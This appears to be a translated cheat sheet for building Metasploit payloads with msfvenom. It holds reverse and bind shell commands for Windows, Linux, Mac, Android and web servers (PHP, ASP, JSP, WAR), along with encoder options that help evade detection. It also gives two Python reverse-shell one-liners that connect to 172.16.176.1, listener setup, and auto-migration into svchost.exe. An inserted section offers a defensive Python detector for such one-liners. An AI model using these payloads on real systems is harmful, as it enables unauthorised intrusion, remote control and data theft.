# Generating payloads with msfvenom

## Important msfvenom options

    msfvenom --list payloads              # list available payloads
    msfvenom --help-formats               # list supported output file formats
    msfvenom -p xxx --payload-options     # show the options a given payload requires

## Encoder options

    -e x86/shikata_ga_nai -i 5 -b "\x00"   # encode 5 times with the shikata_ga_nai encoder and avoid null bytes

## Common payloads

    windows/shell_bind_tcp
    windows/meterpreter/bind_tcp
    windows/meterpreter/reverse_tcp
    windows/x64/meterpreter/reverse_tcp
    linux/x86/shell_bind_tcp
    linux/x86/meterpreter_reverse_tcp

## System payloads

### Linux

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f elf > shell.elf

### Windows

MessageBox test:

    msfvenom -a x86 -p windows/messagebox TEXT="hello, it is a test"

Take care with 32-bit versus 64-bit when generating Windows payloads.

    msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LHOST=xxx LPORT=xxx -f exe > shell.exe
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f exe > shell.exe
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f exe > shell.exe

Taking windows/meterpreter/reverse_tcp as an example: this payload is 32-bit by default, which can also be made explicit with the -a x86 option.

To generate a 64-bit payload, use windows/x64/meterpreter/reverse_tcp instead.

### Netcat

nc bind (forward) connection:

    msfvenom -p windows/shell_hidden_bind_tcp rhost=192.168.0.107 lport=8956 -f exe > 1.exe

nc reverse connection (nc listens):

    msfvenom -p windows/shell_reverse_tcp lhost=192.168.0.107 lport=888 -f exe > 1.exe

### Mac

    msfvenom -p osx/x86/shell_reverse_tcp LHOST=xxx LPORT=xxx -f macho > shell.macho

### Android

    msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f raw > shell.apk

## Web payloads

### PHP

    msfvenom -p php/meterpreter_reverse_tcp LHOST=xxx LPORT=xxx -f raw > shell.php
    # prepend an opening <?php tag to the generated file (uses macOS pbcopy/pbpaste)
    cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

### ASP

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f asp > shell.asp

### JSP

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx LPORT=xxx -f raw > shell.jsp

### WAR

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx LPORT=xxx -f war > shell.war

### Python

    msfvenom -p cmd/unix/reverse_python LHOST=xxx LPORT=xxx -f raw > shell.py
    msfvenom -a python -p python/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f raw > shell.py

Python shell one-liners (run with python or python3):

    python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.176.1",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

    python3 -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('172.16.176.1',9999))\nwhile 1:  proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"
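From the defender's side, the two one-liners above have a recognisable shape in process-creation telemetry: an interpreter started with inline code (`-c`) that creates a socket, connects out, and then either duplicates the socket onto stdin/stdout/stderr before spawning a shell, or runs a recv/Popen(shell=True) loop. The following is an added example, not part of the original notes: it scans constructed process-creation records for exactly that combination. The flat `pid=... user=... image=... cmdline=...` log format, the sample events and the indicator names are all made up for the example.

```python
import re
from dataclasses import dataclass
from typing import Optional, Tuple

# Constructed sample process-creation events (made up for this example, not from the
# original notes), in a flat "key=value" style resembling an EDR or auditd export.
# cmdline is always the last field, so it may contain spaces and '=' characters.
# Events 4312 and 4390 mirror the shape of the two one-liners above; the rest are benign.
SAMPLE_EVENTS = [
    "pid=4312 user=www-data image=/usr/bin/python3 cmdline=python3 -c 'import socket,subprocess,os;"
    's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.176.1",9999));'
    "os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);"
    "p=subprocess.call([\"/bin/bash\",\"-i\"]);'",
    "pid=4390 user=www-data image=/usr/bin/python cmdline=python -c \"exec(\\\"import socket, subprocess;"
    "s = socket.socket();s.connect(('172.16.176.1',9999))\\nwhile 1:  proc = subprocess.Popen(s.recv(1024), "
    "shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);"
    "s.send(proc.stdout.read()+proc.stderr.read())\\\")\"",
    "pid=5001 user=app image=/usr/bin/python3 cmdline=python3 /opt/app/manage.py runserver 0.0.0.0:8000",
    "pid=5002 user=app image=/usr/bin/python3 cmdline=python3 -c 'import json,sys;print(json.load(sys.stdin)[\"version\"])'",
    "pid=5003 user=app image=/usr/bin/python3 cmdline=python3 -c 'import socket;print(socket.gethostname())'",
]

EVENT_RE = re.compile(r"^pid=(\d+)\s+user=(\S+)\s+image=(\S+)\s+cmdline=(.*)$", re.S)

# Each indicator is one building block of an interpreter reverse shell. None is suspicious
# on its own (plenty of legitimate scripts open sockets); the rule fires only on the combination.
INDICATORS = {
    "inline_code":    re.compile(r"\bpython[0-9.]*\s+-c\s"),
    "socket_create":  re.compile(r"socket\.socket\("),
    "socket_connect": re.compile(r"\.connect\(\("),
    "fd_redirect":    re.compile(r"os\.dup2\("),
    "recv_loop":      re.compile(r"\.recv\("),
    "spawn_shell":    re.compile(r"subprocess\.(call|Popen)\(.*?(/bin/(ba)?sh|shell\s*=\s*True)", re.S),
}

# Pulls the (host, port) pair out of a connect((host, port)) call so the finding carries the peer.
CONNECT_RE = re.compile(r"\.connect\(\(\s*['\"]([^'\"]+)['\"]\s*,\s*(\d+)\s*\)\)")


@dataclass(frozen=True)
class Finding:
    pid: int
    user: str
    indicators: tuple
    target: Optional[Tuple[str, int]]


def parse_event(line: str) -> Optional[dict]:
    """Split one flat event line into its fields; None if the line is malformed."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    pid, user, image, cmdline = m.groups()
    return {"pid": int(pid), "user": user, "image": image, "cmdline": cmdline}


def matched_indicators(cmdline: str) -> tuple:
    """Return the sorted names of all indicators present in a command line."""
    return tuple(sorted(name for name, rx in INDICATORS.items() if rx.search(cmdline)))


def is_interpreter_reverse_shell(indicators: tuple) -> bool:
    """Inline code that creates a socket, connects out and wires it to a shell, either by
    dup2 onto the standard descriptors or by a recv -> Popen(shell=True) loop."""
    hit = set(indicators)
    return ({"inline_code", "socket_create", "socket_connect", "spawn_shell"} <= hit
            and bool(hit & {"fd_redirect", "recv_loop"}))


def extract_connect_target(cmdline: str) -> Optional[Tuple[str, int]]:
    m = CONNECT_RE.search(cmdline)
    return (m.group(1), int(m.group(2))) if m else None


def scan(lines) -> list:
    """Run the rule over a sequence of event lines and return one Finding per hit."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        hits = matched_indicators(ev["cmdline"])
        if is_interpreter_reverse_shell(hits):
            findings.append(Finding(ev["pid"], ev["user"], hits, extract_connect_target(ev["cmdline"])))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"pid={f.pid} user={f.user} target={f.target} indicators={','.join(f.indicators)}")
```

The rule deliberately requires the full chain (inline code, socket creation, outbound connect, and a shell wired to the socket) rather than any single token, so the benign `socket.gethostname()` one-liner and the ordinary `manage.py runserver` process in the sample set are not reported; the extracted connect target gives the analyst the peer address to correlate with the listener side.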
    

### Bash

    msfvenom -p cmd/unix/reverse_bash LHOST=xxx LPORT=xxx -f raw > shell.sh

### Perl

    msfvenom -p cmd/unix/reverse_perl LHOST=xxx LPORT=xxx -f raw > shell.pl

## MSF listener

    use exploit/multi/handler
    set PAYLOAD <Payload name>
    set RHOST <RHOST value>
    set RPORT <RPORT value>
    set LHOST <LHOST value>
    set LPORT <LPORT value>
    set ExitOnSession false
    exploit -j -z

## Other settings

AutoRunScript: a script that runs automatically when a session opens.
For example, run the post/windows/manage/migrate module to migrate into another process:

    set AutoRunScript post/windows/manage/migrate

Automatic process migration:

    set prependmigrate true
    set prependmigrateProc svchost.exe

Auxiliary settings:

    set exitonsession false        # keep the listening port open after a session is established so multiple sessions can be accepted
    set stagerverifysslcert false  # prevents the SSL_accept error that can occur when the shell comes back
Original source: https://www.cnblogs.com/nsfoxer/p/14348063.html